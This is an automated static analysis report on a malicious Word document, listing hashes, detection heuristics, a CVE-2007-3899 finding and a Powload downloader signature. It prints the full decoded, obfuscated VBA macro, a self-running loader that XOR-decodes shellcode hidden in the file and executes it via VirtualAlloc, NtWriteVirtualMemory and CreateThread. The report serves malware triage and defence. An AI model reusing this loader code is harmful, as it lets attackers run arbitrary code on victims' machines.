Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f55f22d80156038…

MALICIOUS

Office (OLE)

Size: 206.0 KB
Created: 2017-07-24 18:25:00
Authoring application: Microsoft Office Word
First seen: 2018-03-04
MD5: 08b21b36daadf106c884f77f2dc7307a
SHA-1: c9334620838746474aa611d3786000834d659f9e
SHA-256: 3f55f22d80156038bae31ba6040ff33bbab375d091903f5b4ed4ddfce6627151
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The embedded VBA macro calls Windows API functions such as VirtualAlloc, indicating an attempt to allocate memory for shellcode and execute it. This is further supported by the ClamAV detection 'Doc.Downloader.Powload-6809817-0', which suggests the document's primary purpose is to download and execute a secondary payload.

Heuristics (8)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical; CVE likely; CVE_2007_3899]
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Powload-6809817-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API [medium; SC_STR_VIRTUALALLOC]
    Reference to VirtualAlloc API
  • VBA macros detected [medium; 2 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Document_Open macro [low; OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script:
    Public Sub Document_Open()
        eezpwH
  • Workbook_Open macro [low; OLE_VBA_WBOPEN]
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4530 bytes
SHA-256: 3dcbab8c3ebe67842d18bfe23aab4528c7403fe985a85c55508006917eeee6ff
Detection: ClamAV: No threats found
Obfuscation or payload: likely
37 of 73 identifiers look randomly generated (e.g. 'BNaoZnZvnrPYtQzAeqHSvSmroRBISydbHEvYcZzc'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function fhKRMyHfCv Lib "kernel32" Alias "CreateThread" (ByVal fQpMpbtYlIfxbSRRmrywyRN As Long, ByVal PpQrqw As Long, ByVal feztkYPMJJNrCdNdLe As LongPtr, UCIlnocnXZ As Long, ByVal bIPgZtByHT As Long, FONLzlYbmemeCZwS As Long) As LongPtr
Private Declare PtrSafe Function uBmxsw Lib "kernel32" Alias "VirtualAlloc" (ByVal AeNjkGIRgtLABZAhh As Long, ByVal rsvlWuyAJvcknslTexd As LongPtr, ByVal ucFgxBKkxeYrGrlneoisKKXmP As Long, ByVal ftpHVddqjpNpNvKodExKDVhYPPpK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal KfsqBvqU As LongPtr, ByVal jUnqiVzPBMIvHtOfskmqSfOt As LongPtr, ByVal zkuYlZtuo As String, ByVal CwmNlyanCbLcLD As LongPtr, ByRef jkeDWdgUhI As LongPtr) As LongPtr
#Else
Private Declare Function fhKRMyHfCv Lib "kernel32" Alias "CreateThread"  (ByVal fQpMpbtYlIfxbSRRmrywyRN As Long, ByVal PpQrqw As Long, ByVal feztkYPMJJNrCdNdLe As Long, UCIlnocnXZ As Long, ByVal bIPgZtByHT As Long, FONLzlYbmemeCZwS As Long) As Long
Private Declare Function uBmxsw Lib "kernel32" Alias "VirtualAlloc" (ByVal AeNjkGIRgtLABZAhh As Long, ByVal rsvlWuyAJvcknslTexd As Long, ByVal ucFgxBKkxeYrGrlneoisKKXmP As Long, ByVal ftpHVddqjpNpNvKodExKDVhYPPpK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal KfsqBvqU As Long, ByVal jUnqiVzPBMIvHtOfskmqSfOt As Long, ByVal zkuYlZtuo As String, ByVal CwmNlyanCbLcLD As Long, ByRef jkeDWdgUhI As Long) As Long
#End If

Const EkTpVDtK = &H1000
Const DteCHrVDcYikbF = &H40

Public Sub eezpwH()
    Dim sIwGenldOsBfyGqkaIvRcDeB() As Byte

    sIwGenldOsBfyGqkaIvRcDeB = guTbhWRqfCPCEDSKgz(ActiveDocument.FullName)
    Dim rVZcmmhlxyusKCS As String
    rVZcmmhlxyusKCS = StrConv(sIwGenldOsBfyGqkaIvRcDeB, 64)
    
    Dim AYAJKk
    AYAJKk = Split(rVZcmmhlxyusKCS, "BNaoZnZvnrPYtQzAeqHSvSmroRBISydbHEvYcZzcTIwDLeavxCmDhCGJAJZiMrDPnNqOvAyeQFYMwJGkRfk")

    Dim NUzGaQMPEVlNslb As String
    Dim AQywtoRjnRciAxajkacAGSZSO As String
    Dim oyqyhuRqbYdikDTXlv As String
    AQywtoRjnRciAxajkacAGSZSO = StrConv(StrConv(AYAJKk(UBound(AYAJKk)), 64), 128)
    oyqyhuRqbYdikDTXlv = Mid$(AQywtoRjnRciAxajkacAGSZSO, 3, Len(AQywtoRjnRciAxajkacAGSZSO))

    NUzGaQMPEVlNslb = EeIuByO("lAUfYLytZrqCfGqX", oyqyhuRqbYdikDTXlv)
    
    #If VBA7 Then
        Dim PQQjzNUBYjVQtE As LongPtr
        Dim QaFJnYDUwKYeyzOWDF As LongPtr
    #Else
        Dim PQQjzNUBYjVQtE As Long
        Dim QaFJnYDUwKYeyzOWDF As Long
    #End If

    PQQjzNUBYjVQtE = uBmxsw(0, Len(NUzGaQMPEVlNslb), EkTpVDtK, DteCHrVDcYikbF)
    QaFJnYDUwKYeyzOWDF = NtWriteVirtualMemory(-1, PQQjzNUBYjVQtE, NUzGaQMPEVlNslb, Len(NUzGaQMPEVlNslb), 0)
    QaFJnYDUwKYeyzOWDF = fhKRMyHfCv(0, 0, PQQjzNUBYjVQtE, 0, 0, 0)
End Sub

Public Function guTbhWRqfCPCEDSKgz(ByVal iNFgvKJPxy As String) As Byte()
    Dim AQywtoRjnRciAxajkacAGSZSO As Long
    Dim oyqyhuRqbYdikDTXlv() As Byte
    AQywtoRjnRciAxajkacAGSZSO = FreeFile
    If LenB(Dir(iNFgvKJPxy)) Then
        Open iNFgvKJPxy For Binary Access Read As AQywtoRjnRciAxajkacAGSZSO
        ReDim oyqyhuRqbYdikDTXlv(LOF(AQywtoRjnRciAxajkacAGSZSO) - 1&) As Byte
        Get AQywtoRjnRciAxajkacAGSZSO, , oyqyhuRqbYdikDTXlv
        Close AQywtoRjnRciAxajkacAGSZSO
    Else
        Err.Raise 53
    End If
    guTbhWRqfCPCEDSKgz = oyqyhuRqbYdikDTXlv
    Erase oyqyhuRqbYdikDTXlv
End Function

Public Sub Document_Open()
    eezpwH
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function EeIuByO(YjIRGHRatSPJIq As String, vbfcQzHJGE As String) As String
    Dim jxFdPZsZThthxAsCAevLxoT As Long
    Dim tvwYVqzbmTx As String
    Dim updQrIxdcUIBxW As Integer, UxCORoWNgPDngCAptAiFSqgGWPUH As Integer, a As Long

    For jxFdPZsZThthxAsCAevLxoT = 1 To Len(vbfcQzHJGE)
        a = jxFdPZsZThthxAsCAevLxoT Mod Len(YjIRGHRatSPJIq)
        If a = 0 Then a = Len(YjIRGHRatSPJIq)
        
        updQrIxdcUIBxW = Asc(Mid$(vbfcQzHJGE, jxFdPZsZThthxAsCAevLxoT, 1))
        UxCORoWNgPDngCAptAiFSqgGWPUH = Asc(Mid$(YjIRGHRatSPJIq, a, 1))
        tvwYVqzbmTx = tvwYVqzbmTx + Chr(updQrIxdcUIBxW Xor UxCORoWNgPDngCAptAiFSqgGWPUH)
    Next jxFdPZsZThthxAsCAevLxoT
    
   EeIuByO = tvwYVqzbmTx
End Function